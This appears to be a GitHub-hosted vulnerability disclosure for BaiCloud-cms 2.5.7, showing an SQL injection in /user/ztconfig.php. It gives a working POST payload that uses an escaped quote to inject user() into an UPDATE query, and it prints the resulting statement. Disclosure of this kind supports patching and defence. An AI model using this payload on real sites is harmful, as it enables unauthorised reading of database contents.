Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

BaiCloud

BaiCloud-cms 2.5.7 /user/ztconfig.php SQL injection Vulnerability

Link Url : https://github.com/meiko-S/BaiCloud

Edition : lastest(2.5.7)

0x01 Vulnerability (/user/ztconfig.php line 65)

image after user login then post data

POST /user/ztconfig.php
tongji=1\&baidu_map=,baidu_map=user()#&action=modify&bannerheight=1

then get /user/ztconfig.php page can get result image

0x20 Analysis

we set tongji = 1\ and baidu_map=,baidu_map=user()# then the query is

update zzcms_usersetting set comanestyle='',comanecolor='',swf='',daohang='',bannerbg='',bannerheight='1',mobile='0',tongji='1\',baidu_map=',baidu_map=user()#' where username='admin';

this is a legal sql statement image and when get this page,we can get this value.